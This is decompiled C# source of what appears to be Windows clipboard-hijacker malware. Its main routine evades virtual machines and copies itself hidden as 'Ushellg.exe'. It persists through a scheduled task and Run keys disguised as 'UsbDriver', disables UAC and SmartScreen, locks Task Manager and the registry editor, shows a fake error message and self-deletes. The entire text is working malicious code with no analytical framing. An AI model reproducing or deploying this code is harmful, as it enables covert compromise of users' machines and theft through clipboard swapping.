// Token: 0x06000014 RID: 20 RVA: 0x00002970 File Offset: 0x00000B70
public static bool ToogleSmartScreen(string regpath, string name, string enable)
{
bool result;
try
{
if (RunCheck.IsUserAdministrator())
{
using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryControl.Regview))
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour()))
{
try
{
registryKey2.SetValue(name, enable, RegistryValueKind.String);
return(true);
}
catch
{
return(false);
}
}
}
}
result = true;
}
catch
{
result = false;
}
return(result);
}
// Token: 0x0600000B RID: 11 RVA: 0x00002660 File Offset: 0x00000860
public static bool CheckMutex()
{
bool result;
Mutex obj = new Mutex(true, RunCheck.GetGUID(), ref result);
GC.KeepAlive(obj);
return(result);
}
// Token: 0x06000012 RID: 18 RVA: 0x000027B8 File Offset: 0x000009B8
public static bool ToogleUacAdmin(string regpath, int locker)
{
bool result;
try
{
if (RunCheck.IsUserAdministrator())
{
using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryControl.Regview))
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour()))
{
try
{
foreach (string name in RegistryControl.FieldsLocal)
{
try
{
registryKey2.SetValue(name, locker, RegistryValueKind.DWord);
}
catch
{
}
}
}
catch (Exception)
{
return(false);
}
return(true);
}
}
}
result = true;
}
catch (Exception)
{
result = false;
}
return(result);
}
// Token: 0x06000056 RID: 86 RVA: 0x00004278 File Offset: 0x00002478
public static void CopyAndShelduderInizialize()
{
ProcessControl.KillClipInizialize();
string startUpFromAppDataReserv = GlobalPath.StartUpFromAppDataReserv;
string text = Path.Combine(startUpFromAppDataReserv, Path.GetFileName(GlobalPath.AssemblyPath.Replace(GlobalPath.AssemblyPath, "Ushellg.exe")));
RunSystem.Scheduler(false, "minute", 1, "highest", "UsbDriver", "\"" + text + "\"");
RegistryControl.RegStartupInizialize(false, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbDriver", text);
Directory.Delete(GlobalPath.StartUpFromAppDataReserv);
Thread.Sleep(2000);
if (!Directory.Exists(startUpFromAppDataReserv) && GlobalDirectory.CreateDirectory(startUpFromAppDataReserv))
{
File.Copy(GlobalPath.AssemblyPath, text, false);
Thread.Sleep(2000);
if (File.Exists(text))
{
if (RunCheck.IsUserAdministrator())
{
RunSystem.Scheduler(true, "minute", 1, "highest", "UsbDriver", "\"" + text + "\"");
RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text);
if (!GlobalFile.IsHideOrNo())
{
GlobalFile.HideFile(text, FileAttributes.Hidden);
return;
}
}
else
{
RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text);
if (!GlobalFile.IsHideOrNo())
{
GlobalFile.HideFile(text, FileAttributes.Hidden);
}
ProcessControl.RunFile(text);
}
}
}
}
// Token: 0x06000013 RID: 19 RVA: 0x00002888 File Offset: 0x00000A88
public static bool ToogleTaskMandRegedit(string regpath, int locker)
{
bool result;
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour()))
{
using (RegistryKey registryKey2 = registryKey.CreateSubKey("System"))
{
registryKey2.SetValue("EnableLUA", 0, RegistryValueKind.DWord);
registryKey2.SetValue("PromptOnSecureDesktop", 0, RegistryValueKind.DWord);
try
{
foreach (string name in RegistryControl.FiledsSystem)
{
try
{
registryKey2.SetValue(name, locker);
}
catch
{
}
}
}
catch (Exception)
{
return(false);
}
result = true;
}
}
}
catch
{
result = false;
}
return(result);
}
public static void Main()
{
if (RunCheck.CheckMutex())
{
Date date = new Date();
if (date.AntiVm && CheckVirtual.CheckWMI())
{
Environment.Exit(0);
}
if (date.Delay)
{
Program.Sleeping(RunCheck.ThreadSleep);
}
if (GlobalPath.AssemblyPath.StartsWith(GlobalPath.StartUpFromAppDataReserv, StringComparison.OrdinalIgnoreCase))
{
if (!GlobalFile.IsHideOrNo())
{
GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden);
}
ClipChanger.StartChanger();
return;
}
new Thread(delegate()
{
ProcessControl.KillClipInizialize();
})
{
IsBackground = true
}.Start();
if (date.AddGarbage)
{
new Thread(delegate()
{
Garbage.InizializeTrash(500);
}).Start();
}
if (date.FakeText)
{
File.WriteAllText(string.Concat(new string[]
{
"Error.txt"
}), GlobalPath.MessageErrorTextForUser);
}
if (date.AddInSystemRun)
{
InjReg.CopyAndShelduderInizialize();
RegistryControl.ToogleHidingFolders("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", 2);
ExpSetting.RefreshExplorer();
if (date.Uac)
{
RegistryControl.ToogleUacAdmin("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0);
}
if (date.Smart)
{
RegistryControl.ToogleSmartScreen("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", "SmartScreenEnabled", "Off");
}
if (date.TaskLock)
{
RegistryControl.ToogleTaskMandRegedit("Software\\Microsoft\\Windows\\CurrentVersion\\Policies", 1);
}
GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Normal);
Liquidation.Inizialize(GlobalPath.BatchFile);
Liquidation.SelfDelete("cmd.exe", "/C choice /C Y /N /D Y /T 1 & Del \"" + GlobalPath.GetFileName);
return;
}
if (!GlobalFile.IsHideOrNo())
{
GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden);
ClipChanger.StartChanger();
return;
}
}
else
{
Environment.Exit(0);
}
}
